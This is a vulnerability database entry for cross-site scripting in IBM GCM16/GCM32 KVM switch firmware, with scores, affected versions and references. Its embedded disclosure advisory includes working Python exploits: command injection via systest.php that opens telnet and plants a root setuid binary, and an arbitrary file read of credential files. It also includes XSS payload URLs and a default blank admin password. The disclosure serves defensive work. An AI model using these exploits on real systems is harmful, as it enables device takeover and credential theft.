ID

VAR-201408-0279


CVE

CVE-2014-3080


TITLE

IBM GCM16 and GCM32 Global Console Manager Cross-site scripting vulnerability in switch firmware

Trust: 0.8

sources: JVNDB: JVNDB-2014-003831

DESCRIPTION

Multiple cross-site scripting (XSS) vulnerabilities on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to kvm.cgi or (2) the key parameter to avctalert.php. IBM 1754 GCM16 and GCM32 Global Console Managers are prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. The following versions are vulnerable: IBM 1754 GCM16 Global Console Manager running firmware 1.20.0.22575 and prior IBM 1754 GCM32 Global Console Manager running firmware 1.20.0.22575 and prior. IBM 1754 GCM16 and GCM32 Global Console Managers (GCM) are both 1754 series KVM switch products of IBM Corporation in the United States. The product supports AES encryption, LDAP and smart card/common access card (CAC) readers and more, enabling centralized authentication and local or remote system access. The vulnerability stems from insufficient filtering of the 'query' string in the kvm.cgi file and insufficient filtering of the 'key' parameter in the avctalert.php script . *Product description* The IBM 1754 GCM family provides KVM over IP and serial console management technology in a single appliance. Versions v1.20.0.22575 and prior are vulnerables. Note that this vulnerability is also present in some DELL and probably other vendors of this rebranded KVM. I contacted Dell but no response has been received. *1. Remote code execution * CVEID: CVE-2014-2085 Description: Improperly sanitized input may allow a remote authenticated attacker to perform remote code execution on the GCM KVM switch. PoC of this vulnerability: #!/usr/bin/python""" Exploit for Avocent KVM switch v1.20.0.22575. Remote code execution with privilege elevation. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. Default user is "Admin" with blank password. After running exploit, connect using telnet to device with user target (pass: target) then do "/tmp/su -" to gain root (password "root") alex.a.bravo@gmail.com """ from StringIO import StringIO import pycurl import os sessid = "1111111111" target = "192.168.0.10" durl = "https://" + target + "/systest.php?lpres=;%20/usr/ sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod% 206755%20/tmp/su%20;" storage = StringIO() c = pycurl.Curl() c.setopt(c.URL, durl) c.setopt(c.SSL_VERIFYPEER,0) c.setopt(c.SSL_VERIFYHOST,0) c.setopt(c.WRITEFUNCTION,storage.write) c.setopt(c.COOKIE,'avctSessionId=' + sessid) try: print "[*] Sending GET to " + target + " with session id " + sessid + "..." c.perform() c.close() except: print "" finally: print "[*] Done" print "[*] Trying telnet..." print "[*] Login as target/target, then do /tmp/su - and enter password \"root\"" os.system("telnet " + target) *2. Arbitrary file read * CVEID: CVE-2014-3081 Description: This device allows any authenticated user to read arbitrary files. Files can be anywhere on the target. PoC of this vulnerability: #!/usr/bin/python """ This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to read arbitrary files on device. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. alex.a.bravo@gmail.com """ from StringIO import StringIO import pycurl sessid = "1111111111" target = "192.168.0.10" file = "/etc/IBM_user.dat" durl = "https://" + target + "/prodtest.php?engage=video_ bits&display=results&filename=" + file storage = StringIO() c = pycurl.Curl() c.setopt(c.URL, durl) c.setopt(c.SSL_VERIFYPEER,0) c.setopt(c.SSL_VERIFYHOST,0) c.setopt(c.WRITEFUNCTION,storage.write) c.setopt(c.COOKIE,'avctSessionId=' + sessid) try: c.perform() c.close() except: print "" content = storage.getvalue() print content.replace("<td>","").replace("</td>","") *3. Cross site scripting non-persistent* CVEID: CVE-2014-3080 Description: System is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. Examples: http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E *Vendor Response:* IBM release 1.20.20.23447 firmware *Timeline:* 2014-05-20 - Vendor (PSIRT) notified 2014-05-21 - Vendor assigns internal ID 2014-07-16 - Patch Disclosed 2014-07-17 - Vulnerability disclosed *External Information:* Info about the vulnerability (spanish): http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html IBM Security Bulletin: http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983 -- -- Alejandro Alvarez Bravo alex.a.bravo@gmail.com

Trust: 2.07

sources: NVD: CVE-2014-3080 // JVNDB: JVNDB-2014-003831 // BID: 68777 // VULHUB: VHN-71019 // PACKETSTORM: 127543

AFFECTED PRODUCTS

vendor:ibmmodel:global console manager 32scope:lteversion:1.20.0.22575

Trust: 1.0

vendor:ibmmodel:global console manager 16scope:lteversion:1.20.0.22575

Trust: 1.0

vendor:ibmmodel:1754 gcm16 global console managerscope:ltversion:1.20.20.23447

Trust: 0.8

vendor:ibmmodel:1754 gcm32 global console managerscope:ltversion:1.20.20.23447

Trust: 0.8

vendor:ibmmodel:global console manager 16scope:eqversion:1.20.0.22575

Trust: 0.6

vendor:ibmmodel:global console manager 32scope:eqversion:1.20.0.22575

Trust: 0.6

sources: JVNDB: JVNDB-2014-003831 // CNNVD: CNNVD-201407-642 // NVD: CVE-2014-3080

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2014-3080
value: MEDIUM

Trust: 1.0

NVD: CVE-2014-3080
value: MEDIUM

Trust: 0.8

CNNVD: CNNVD-201407-642
value: MEDIUM

Trust: 0.6

VULHUB: VHN-71019
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2014-3080
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-71019
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: VULHUB: VHN-71019 // JVNDB: JVNDB-2014-003831 // CNNVD: CNNVD-201407-642 // NVD: CVE-2014-3080

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.9

sources: VULHUB: VHN-71019 // JVNDB: JVNDB-2014-003831 // NVD: CVE-2014-3080

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201407-642

TYPE

XSS

Trust: 0.6

sources: CNNVD: CNNVD-201407-642

CONFIGURATIONS

sources: JVNDB: JVNDB-2014-003831

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-71019

PATCH

title:MIGR-5095983url:http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983

Trust: 0.8

sources: JVNDB: JVNDB-2014-003831

EXTERNAL IDS

db:NVDid:CVE-2014-3080

Trust: 2.9

db:BIDid:68777

Trust: 2.0

db:EXPLOIT-DBid:34132

Trust: 1.7

db:PACKETSTORMid:127543

Trust: 1.2

db:JVNDBid:JVNDB-2014-003831

Trust: 0.8

db:CNNVDid:CNNVD-201407-642

Trust: 0.7

db:SECUNIAid:60260

Trust: 0.6

db:XFid:93929

Trust: 0.6

db:VULHUBid:VHN-71019

Trust: 0.1

sources: VULHUB: VHN-71019 // BID: 68777 // JVNDB: JVNDB-2014-003831 // PACKETSTORM: 127543 // CNNVD: CNNVD-201407-642 // NVD: CVE-2014-3080

REFERENCES

url:http://www.securityfocus.com/bid/68777

Trust: 1.7

url:http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983

Trust: 1.7

url:http://www.exploit-db.com/exploits/34132/

Trust: 1.7

url:http://seclists.org/fulldisclosure/2014/jul/113

Trust: 1.1

url:http://packetstormsecurity.com/files/127543/ibm-1754-gcm-kvm-code-execution-file-read-xss.html

Trust: 1.1

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/93929

Trust: 1.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3080

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-3080

Trust: 0.8

url:http://xforce.iss.net/xforce/xfdb/93929

Trust: 0.6

url:http://secunia.com/advisories/60260

Trust: 0.6

url:http://kvm/kvm.cgi?%3cscript%3ealert%28%22aaa%22%29%3c/script%3e

Trust: 0.1

url:https://"

Trust: 0.1

url:http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html

Trust: 0.1

url:https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3cscript%3ealert%28%22aaa%22%29%3c/script%3e

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2014-2085

Trust: 0.1

url:http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2014-3080

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2014-3081

Trust: 0.1

sources: VULHUB: VHN-71019 // JVNDB: JVNDB-2014-003831 // PACKETSTORM: 127543 // CNNVD: CNNVD-201407-642 // NVD: CVE-2014-3080

CREDITS

Alejandro Alvarez Bravo

Trust: 1.0

sources: BID: 68777 // PACKETSTORM: 127543 // CNNVD: CNNVD-201407-642

SOURCES

db:VULHUBid:VHN-71019
db:BIDid:68777
db:JVNDBid:JVNDB-2014-003831
db:PACKETSTORMid:127543
db:CNNVDid:CNNVD-201407-642
db:NVDid:CVE-2014-3080

LAST UPDATE DATE

2025-04-13T23:05:08.269000+00:00


SOURCES UPDATE DATE

db:VULHUBid:VHN-71019date:2017-08-29T00:00:00
db:BIDid:68777date:2014-07-14T00:00:00
db:JVNDBid:JVNDB-2014-003831date:2014-08-19T00:00:00
db:CNNVDid:CNNVD-201407-642date:2014-08-18T00:00:00
db:NVDid:CVE-2014-3080date:2025-04-12T10:46:40.837

SOURCES RELEASE DATE

db:VULHUBid:VHN-71019date:2014-08-17T00:00:00
db:BIDid:68777date:2014-07-14T00:00:00
db:JVNDBid:JVNDB-2014-003831date:2014-08-19T00:00:00
db:PACKETSTORMid:127543date:2014-07-21T19:57:35
db:CNNVDid:CNNVD-201407-642date:2014-07-29T00:00:00
db:NVDid:CVE-2014-3080date:2014-08-17T23:55:06.853